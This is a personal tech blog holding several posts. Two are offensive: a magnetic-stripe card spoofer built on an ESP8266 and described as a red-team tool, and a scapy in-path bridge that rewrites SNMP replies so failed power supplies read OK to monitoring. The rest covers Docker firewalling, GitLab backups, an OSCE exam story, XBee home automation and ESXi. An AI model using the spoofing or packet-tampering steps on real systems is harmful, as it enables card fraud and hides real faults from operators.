Magspoof v4, RedSpoof

Some time ago I came across Samy Kamkar’s Magspoof implementation and thought that would be a very helpful utility.

However in the current implementation it wasn’t mobile enough for me – Magspoof and MagspoofV2 itself are quite tiny and portable but I would need an ISP prog and computer to change the numbers it emulates.
Other Implementations are available – “BlueSpoof” use the phone and a modified speaker to emulate a magstripe to a card reader, however you would need to convert your numbers to a WAV file first.

So I digged a little more, found how idogendel thought about the requireness of magnetic reversal feature and some more information about magnetic cards.

I decided to build my very own implementation and call it “Magic Wand” but after I googled that term I found that it was an established name in a very different industry :)

So, here it is – “RedSpoof” – a portable MagSpoof implementation that can be programmed for different numbers via WiFi in just a matter of seconds.
Also it runs off of a standard 5v USB charger which make it perfect for my use case – official RedTeam engagements.

My requirements were:

  • portable
  • easy to configure
  • easy to power – no fancy 3.7v LiPo with extra charger set that has to be carried around etc.
  • secure – the WiFi should only be enabled when I want to change the numbers being spoofed
  • Base upon ledunia (ESP8266) because I got it for free and needed a project for it ;)

Special thanks to Paessler for giving out a free ledunia to me, without the ledunia this project wouldn’t happen. Thank You!

For the portability part I implemented the magspoof code in Python, perfect for use with a ledunia

Further I reduced the required hardware to a very simple board that consists of:

  • 2 simple push-buttons
  • isolated wire from a motor (50 rounds around the board)
  • 1 transistor
  • jumper connectors to connect to the ledunia

The “attack” workflow is like that:

  1. Power on – Put into the power-bank (all ledunia lights on)
  2. press activate button (lights glow red)
  3. put it near (1-4 cm) to your target, spoof the number
  4. press activate button again to set it back to standby mode or just pull it out and back in to the battery (all lights on)

To change the stored number:

  1. Power on (all ledunia lights on)
  2. press the second button to activate WiFi (lights glow blue)
  3. connect phone, change number – it is stored permanently throughout reboots
  4. run through “attack” workflow

 

In my test environment it works like a charm, however you have to be careful as the BC547 transistor I use get’s very hot because it effectively shortens the coil to the battery power.

Feel free to contribute to the design.

The card readers I got in the hands easily accepted the spoofed numbers for track1 and track2, even with text where others have problems. I couldn’t test track3 yet.

The code is designed to spoof track1 and track 2 if both are input, if track1 or track2 is missing then the remaining track is spoofed as “track2” because that is the most important track and used by most readers to verify numbers.

 

For the python code, please see my github repository here.
https://github.com/devBioS/RedSpoof

If you have a fresh ledunia you should first install micropython firmware as described here: Micropython on ESP8266

I use mpfshell to connect to the ledunia and upload new code:

# mpfshell
> open ttyUSB0
> put main.py
> put webserver.py
> put config.py

put the ledunia out of the USB Port and to a USB charger, see if the lights will light up.

If they do everything should be ready.

Press the wifi button, blue lights should turn on and you can connect to the Webinterface on IP 192.168.4.1.
After config, the system should reset and you can press the “spoof” button to start spoofing.
Press the “spoof” button again to stop spoofing.

– WARNING –
NEVER connect the ledunia with the coilboard attached to your computer, it could destroy your USB ports!!

– DISCLAIMER –

This project is made for people who want to learn about the insecurity of magnetic card readers.

It is for EDUCATIONAL PURPOSES ONLY.

Please do not do anything illegal with that. I mean I do not endorse any such behavior.

RedTeamers should always have a signed contract allowing such type of attacks on their clients. You are responsible for your actions.

 

If you rebuild it, let me know!

If you make it better, please send me a merge request ;)

 

Advertisements

docker firewall blocking at the source port

Today I installed my brand new docker host system, started some images and as usual trying to setup iptables to restrict the ports to specific source servers and ports.

Hours later I learned that this was kinda not so easy.

  • You cannot use the INPUT chain as Docker works with the standard bridge in the FORWARD chain.
  • The DOCKER-USER chain (which is a part of the FORWARD chain) see packets after they have been redirected to the destination port, so if we have multiple containers running at port 8000 internally it get’s very complex to find the correct container, not to mention new containers starting up.

One example:

I have a docker image that runs a web-server listening inside the container on port 8000 which is mapped to the host port 80 as in this config:

ports:
– “80:8000”

This means my host is listening on port 80 and that get’s redirected to the Docker container on port 8000.

Now the DOCKER-USER chain sees only port 8000 where I could drop some other source IP.

But I want to selectively open ports and let not configured ones dropped by default, even if somebody spin’s up new containers.

The docker-documentation and some other sources disable the iptables feature of docker and manually configure the firewall, which is okay but not that what I wanted as the sources allow general inter-container communication or have a VERY complex rulesystem that I don’t want to explain the my Administrator colleagues of that system.

 

The solution to this is hidden within the iptables flow diagram:

The PREROUTING chain of the nat table is the first one that get touched and where the source port of 80 is redirected to the container on the destination port 8000.

So we tag the SYN packets we want to drop in the PREROUTING chain of the mangle table with the MARK target and later at the DOCKER-USER chain of the filter table we will drop them accordingly.

My final ruleset looks like that:

 

#!/bin/bash

#Flush and setup:
/sbin/iptables -F DOCKER-USER
/sbin/iptables -t mangle -F PREROUTING

##############
# Docker conf
###############
#packets in NAT table are only traversed with the first packet!
#MARK1: allowed packet
#MARK2: drop this in FORWARDING (DOCKER-USER)Chain
#Mark everything with 0x2, so block everything
/sbin/iptables -t mangle -A PREROUTING -i ens3 -m state –state NEW -j MARK –set-mark 2
###
# Mark the packets we want to allow with 0x1 (which are previously also mark’ed with 0x2)
###
/sbin/iptables -t mangle -A PREROUTING -i ens3 -m tcp -p tcp –dport 80 -s xxx.xxx.xxx.xxx -j MARK –set-mark 1
/sbin/iptables -t mangle -A PREROUTING -i ens3 -m tcp -p tcp –dport 443 -j MARK –set-mark 1

###
# Drop the packets marked with 0x2
###

/sbin/iptables -A DOCKER-USER -m mark –mark 2 -j DROP
/sbin/iptables -A DOCKER-USER -j RETURN

This ruleset will allow port 80 from a specific IP address and port 443 from every source IP. Everything else exposed by docker containers is not reachable for anybody – or at least they cannot open a TCP connection to it because the initial SYN packets are dropped away.

And the best is I can start as much containers as I want on port 8000 and don’t have to fiddle around with the internal docker ports.

Hope that helps somebody ;)

Gitlab “file changed as we read it”

Months after the OSCE and my shiny new OSCP certification, a refactor of the infrastructure and a current build-up of a “Security Operation Center”, I’m fully back at work.

My desk is fullblown with management documents and other shit I don’t want to read, instead I’m looking at my screen after I builded a Docker Infrastructure including a GitLab server:

root@7845ae79a54c:/# gitlab-rake gitlab:backup:create
Dumping database …
Dumping PostgreSQL database gitlabhq_production … [DONE]
done
Dumping repositories …
done
Dumping uploads …
tar: ./-/….. file changed as we read it
Backup failed

Hmm, great :) Not only that the gitlab server is no more than a day old, the backup won’t work. Grr.

Long Story short, after a lot of googling my problem was a GlusterFS mount on my docker host which is bound into the Docker container.

The fix is to issue i issued the following commands on my docker host:

gluster volume info
gluster volume set dockergfs cluster.consistent-metadata on

And after a host reboot (or remount just as you like), surprise surprise the backup works now!

 

If I find more time between my family, my private projects and my daily business I’ll write a review of the OSCP course if there is interest :)

Transparently sniffing and modify traffic with scapy in-path

I decided to play a little bit with scapy and tried to find something in the internet that helped me to sniff and modify traffic without ARP-Storming the whole network.

I want to connect a box to my computer eth0 and the network to eth1, so that I’m between the box and the network.

Note: This one does not defeat SSL right now, but that could be easily done with all the tools out there.

The idea is to transparently forward all traffic and only pick out specific packets for modification with scapy.

I did do this with an combination of bridged interface, iptables NFQueue and scapy.

First we gonna create a bridge between eth0 and eth1 to transparently forward all traffic:

ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0 eth1
ifconfig br0 up

Second, we need to setup iptables to send the traffic we want to change to an NFQueue.
Important is that this line is executed within the startup of the scapy script, so the actual modding only happens if the script is running.
It would be bad if the script is not running and the packets don’t traverse..

The line we need to set in the scapy script is:

iptables -A FORWARD -m physdev –physdev-in eth1  -s 192.168.1.10 -j NFQUEUE

Third, our scapy program catches those packets, modify them if they are of interest for us and forwards them accordingly.
Important is to command scapy that it should also forward traffic we do not want to be modified (e.g. other SNMP calls in this example):

https://github.com/devBioS/scapy-mitm

What I actually do is to modify a response of our target system to the monitoring system.
I choose the SNMP response of an HP ProLiant power-supply check that checks if the power supplies are OK or not (or disconnected):

The “original” says that both power-supplies are degraded or in other words they have a problem:

# snmpwalk -v 1 -c public -O eq 192.168.1.10 1.3.6.1.4.1.232.6.2.9.3.1.4
iso.3.6.1.4.1.232.6.2.9.3.1.4.1.1 3
iso.3.6.1.4.1.232.6.2.9.3.1.4.1.2 3

# ./check_psu -H 192.168.1.10
PSU 1 DEGRADED, PSU 2 DEGRADED

after starting the scapy script, it will happily transform to something much better:

#./scapymod.py
Adding iptable rules :
iptables -A FORWARD -m physdev –physdev-in eth1 -s 192.168.1.10 -p udp -j NFQUEUE
[+] Running Main loop
Got a packet ! source ip : 192.168.1.10 dest: 192.168.1.60
Modding…
Old status: 2 (<ASN1_OID[‘.1.3.6.1.4.1.232.6.2.9.3.1.4.1.1’]>)
New status: 2 (OK)
Got a packet ! source ip : 192.168.1.10 dest: 192.168.1.60
Modding…
Old status: 2 (<ASN1_OID[‘.1.3.6.1.4.1.232.6.2.9.3.1.4.1.2’]>)
New status: 2 (OK)

and in the console:

# snmpwalk -v 1 -c public -O eq 192.168.1.10 1.3.6.1.4.1.232.6.2.9.3.1.4
iso.3.6.1.4.1.232.6.2.9.3.1.4.1.1 2
iso.3.6.1.4.1.232.6.2.9.3.1.4.1.2 2

# ./check_psu -H 192.168.1.10
PSU 1 OK, PSU 2 OK

And this all by just carefully crafting and modifying packets

Have Phun :)

My OSCE / CTP Story

It was quite a long time since my last post now. That is simply because my family and my job is taking up all my time since the last years ;) The last month I found myself that I need to challenge myself and wished long time ago to get a technical certification in the security sector.

My last certification was quite a lot of time ago and was a Qualys Guard certification so i searched the internet for an adequate challenge to take.

After reading some blogs i found that the certifications from
http://www.offensive-security.com seemd to be really challenging, even for people who worked for years as pentesters.
A bit of reading on the offensive website stated:

“… widely regarded as one of the most respected and difficult to obtain technical information security certifications available, the OSCE is the industry premier advanced penetration testing certification.
Holders of this certification are part of an elite group who have proven they have what it takes to be among the best and brightest in the field.”

Umm making that statement from such a respected company…
I thought this could be really challenging.
So i decided to give the Cracking the Perimeter and the resulting Offensive Security Certified Expert (OSCE) a shot

That said, I found myself over at fc4.me, the registration challenge for the CTP course.

The first few steps of http://fc4.me were quite easy, just because I had managed to get a few levels over at http://3564020356.org years ago and remember everything of that, the rest you can think of yourself :)

Please be aware that I will not give any hints on the registration challenge / the course or the exam.

The exam is so hard – if you can not make it yourself and need to use hints from anybody to do the exam you are cheating and have not deserved the certificate.

-the CTP course-

You will have an option to register for 30 or 60 days, i chose 60 days and planned to do my exam after about 45 days and if i could not archive it, I could work on the lab for another 15 days and try again.

If you need other information’s about the course itself, give google a shot, there are plenty of reviews on the CTP course itself.

Of course nothing you plan for your life is exactly happening the way you planned before.

I wanted to plan my exam 15th April but on Friday 2016-03-25 my public services provider dropped a letter that they will break up the whole street where I live and maintain power, gas and water for 15 WEEKS, starting the 15th April.

Damnit, so i cannot rely on a stable internet connection for the whole 48 hours of exam.

I then found an exam slot at Monday 28th March – yeah 2 days after I received the letter from public services..

I then scheduled the exam to this date…

As stated before that nothing you plan is going exactly this way, everything is trying to get the hell out of me and my whole family went sick in the night to Monday >:(

Nothing i could do – I couldn’t reschedule the exam and had to do it now.

– the exam –

I can’t tell you how nervous I was. I created a lot of scripts beforehand where I thought Offensec will put me some stones. I even learned python a little bit as I want to get everything I could from the course.

The exam consists of 4 challenges, 2 with more points, 2 with fewer points rewarded.

I started with the smaller ones where even my scripts come handy so my nervousness flattened..
7 hours later I had 3 out of 4 challenges made.

I started the exam at 16:00 PM now it was 1 o’clock. I went to my first sleep.
Wakened up at 8AM I get a coffee and immediately headed over for the last challenge.

This challenge could be broken up in 2 parts and after some fiddling I got the first part working after two hours or so.
But then, this one put everything out of me, I couldn’t get it to do what I want – I worked really hard with some little breaks to regain consciousness.
I found several ways that *could* work, but none of them did work at the end and I started to get frustrated.

It is now 02:00 AM and I went to bed again, couldn’t do anymore..

After a horrible sleep I woke up and the first thing that came to my mind was:
“T-R-Y   H-A-R-D-E-R!”
Okay, got a coffee.. More ideas came…
5 hours later I was really between hope and desperation.
It was now 13:00 and I started to get ready to fail at the last step of the exam.

But not with me, I tried shooting at the dev-target as much as I could and baaam!
Out of nowhere my last idea did work!

Now I started to get really nervous now, I had to hack all my findings together in a working manner and has to circumvent some little problems but I managed to get everything up and working 2 hours before the end of the exam.

Now I was ready to work against the objective and on the first attempt it did work!

YEAH I was so happy that I screamed around and really felt like a hero.

I hacked together my documentation of everything for what i had again 24 hours after the exam but I needed to know if I did pass or not. I had invested soo much hard thinking I couldn’t wait for the result.

After 2 days I got the revenue:

We are happy to inform you that you have successfully completed the Cracking the Perimeter certification exam and have obtained your Offensive Security Certified Expert (OSCE) certification

And they even sent me a nice image to include in my online activities:

osce

In the end I was sooo close to give up, but the moment when you overcome this feeling and get it working is what everybody out there is meaning with the words “try harder” – with enough persistence everything is possible.

Thank you Offensive-Security for this mind-blowing course and to allow me to master success and failure – this was the hardest thing I ever have made under the pressure of time!

Really I need to say thanks to my 2 kids and my wife – they have gone sick but managed to not disturb me the whole 3 days while i took the exam. Thank you :) Love you ;)

Now, the next step is to recon from this and to get my family healthy again ;)

XBEE Ready.

Now, in my last Posts i showed you that i use the Xbee Series to play a little bit around.

First of all i tried to design a system that allows me to realize my House Automation.

I wanted to include the Xbee System as this not just helps me to save cables, but enable me doing freaky wireless stuff like remote-open my door or alarming all Xbee Chips at the same time that some burgular trying to do his work.

I had the following things in mind:

  • Xbee Devices are all over the house, encryption on, connected to a Micro like the ATMega32 or standalone (for my letterbox)
  • Communicator is hooked up to a linux system so i can take control from there
  • Xbee’s should communicate with each other, the Computer is just passive

So the following thing is what i need:

1. XBee’s in API Mode
This is a must as only in this mode fast addressing is possible

2. Linux system connected to the Coordinator via FTDI

I had the standard ftdi_sio module loaded with the connected FTDI 232BL, it got’s recognized and i can communicate with the XBee.
After a while i can write to the XBee but my subsequent read’s doesn’t return anything.

While i debugged and changed my Code over two Month’s i found the Problem: The FTDI Chip or the ftdi_sio driver.
I use perl, threads and a lot of other stuff i never used before and searched the Problem there. But i didn’t find anything.
A quick test with an standard RS232 Converter + XBee resulted that my Code is completly OK. >:[ D-A-M-N

3. Preferbly a Perl Script that run’s a a Server
So more than one “Client” can Connect to it and Control everything, for ex. a recurring linux Cron Job checking Temperature and a “GUI” User Interface on Windows should not disturb each other and both should work at the same time.

4. Xbee’s connected to ATMega32
No problems here, ATMega32 have a Serial Interface

5. ATMega32 API
This was not too hard to write, but the Memory Management is tricky..
I learned that i even can overwrite my Memory with BASCOM, so this is no more excuse to not use C ^^

 

This was written about two years ago, in the meantime i created a system exact like this one, written a perl server and has the XBee’s connected.

Everything is fine until a day where all XBee’s lost it’s connection to the coordinator without an obvoius reason.

I’m still investigating why the Radiochips loose it’s connection, sometimes it takes 3-4 Weeks, sometimes every hour they loose it.

I’m really disappointed about the relaiability of those XBee’s, i thought they will reconnect to other routers but it seems that one XBee is sticked to it’s parent forever.

I’ve written an perl server with jabber and network integration for the System but i discarded it.
At the moment i’m concentrating on an FHEM implementation as I started to head over to HomeMatic :)

More to come..

 

 

ESXi 5: Expanding datastore by extending local array

Recently i extended my RAID 5 array by replacing one-by-one hdd’s with bigger ones and waiting for each to rebuild.

All the instructions are executed on a HP DL360 G6 with an SmartArray P410i controller with only one logicaldisk.

It is highly recommended that you backup all your VM’s before executing a single command – everything worked fine for me but one error in a command could leas to a complete data loss of everything!

Continue reading “ESXi 5: Expanding datastore by extending local array”